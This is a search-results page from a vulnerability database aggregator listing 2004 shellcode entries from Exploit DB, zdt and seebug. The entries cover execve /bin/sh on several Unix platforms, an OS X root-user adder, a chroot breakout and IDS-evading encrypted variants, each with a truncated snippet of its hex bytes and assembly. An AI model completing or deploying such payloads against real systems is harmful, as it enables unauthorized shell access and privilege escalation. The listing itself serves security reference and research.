Lucene search
+L

1170 matches found

Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.43 views

freebsd/x86 - execve /bin/sh 37 bytes

freebsd/x86 execve /bin/sh 37 bytes. Shellcode exploit for freebsdx86 platform / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator preedatoratsendmaildotru / char FreeBSDcode=...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.35 views

os-x/PPC Add user r00t 219 bytes

os-x/PPC Add user r00t 219 bytes. Shellcode exploit for osxppc platform / PPC OS X / Darwin Shellcode by B-r00t. 2003. open; write; close; execve; exit; See ASM below. 219 Bytes! / char shellcode = "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"...

0.2AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.132 views

Aix execve /bin/sh 88 bytes

Exploit for aix platform in category shellcode =========================== Aix execve /bin/sh 88 bytes =========================== / Aix execve of /bin/sh Georgi Guninski email protected / unsigned int code= 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 ...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.25 views

Unixware execve /bin/sh 95 bytes

No description provided by source. / UnixWare execve of /bin/sh by K2 / char shell = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.14 views

linux/x86 execve /bin/sh tolower() evasion 41 bytes

No description provided by source. / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include stdio.h char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" / movl %esi, %edi / "\x83\xc7\x07" / addl $0x07,...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.16 views

linux/x86 execve /bin/sh setreuid(12 12) 50 bytes

No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %al / "\x29\xdb" / subl %ebx, %ebx / / Here's...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.27 views

linux/x86 unix/SPARC execve /bin/sh 80 bytes

No description provided by source. / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include stdio.h char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" "\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10"...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.28 views

linux/x86 unix/SPARC execve /bin/sh 80 bytes

linux/x86 unix/SPARC execve /bin/sh 80 bytes. Shellcode exploits for multiple platform / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"...

0.3AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.29 views

linux/x86 execve /bin/sh 38 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 38 bytes ================================= / email protected execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include char shellcode= "\xeb\x18" //...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.45 views

linux/x86 execve /bin/sh encrypted 58 bytes

linux/x86 execve /bin/sh encrypted 58 bytes. Shellcode exploit for linx86 platform / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // [email protected] 0x1d abril 0x7d2 ./test.c !!! Shellcode execve sh Encriptada !!! AHORA EN 58 BYTES !!!!!!!!!!!!!! Notese que la...

7.4AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.26 views

linux/x86 bsd/x86 execve /bin/sh 38 bytes

No description provided by source. / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include stdio.h char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x54" "\x53" "\x50" "\x8c\xe0" "\x21\xc0" "\x74\x04" "\xb0\x3b" "\xeb\x07" / si es bsd saltam...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.39 views

linux/x86 unix/SPARC execve /bin/sh 80 bytes

Exploit for multiple platform in category shellcode ============================================ linux/x86 unix/SPARC execve /bin/sh 80 bytes ============================================ / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode=...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.37 views

linux/x86 execve /bin/sh encrypted 58 bytes

Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve /bin/sh encrypted 58 bytes =========================================== / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // email protected 0x1d abril 0x7d2...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.19 views

linux/x86 break chroot execve /bin/sh 80 bytes

No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.26 views

linux/x86 execve /bin/sh setreuid12,12 50 bytes

linux/x86 execve /bin/sh setreuid12,12 50 bytes. Shellcode exploit for linx86 platform / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %a...

0.2AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.18 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

Exploit for multiple platform in category shellcode ================================================================ linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes ================================================================ / Shellcode ejecuta execve /bin/sh en Irix/mips,...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.17 views

linux/x86 execve /bin/sh 24 bytes

No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.28 views

linux/x86 break chroot execve /bin/sh 80 bytes

linux/x86 break chroot execve /bin/sh 80 bytes. Shellcode exploit for linx86 platform / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...

SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.36 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

No description provided by source. / Shellcode ejecuta execve /bin/sh en Irix/mips, Linux/x86, Unix/sparc by dymitr1 [email protected] / include stdio.h char code= "\x37\x37\xeb\x2f\x30\x80\x00\x12\x04\x10\xff\xff\x24\x02\x03\xf3\x23\xff\x02\x14\x23\xe4\xfe\x08"...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.31 views

linux/x86 execve /bin/sh 29 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 29 bytes ================================= / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx...

7AI score
SaveExploits0
Rows per page
Query Builder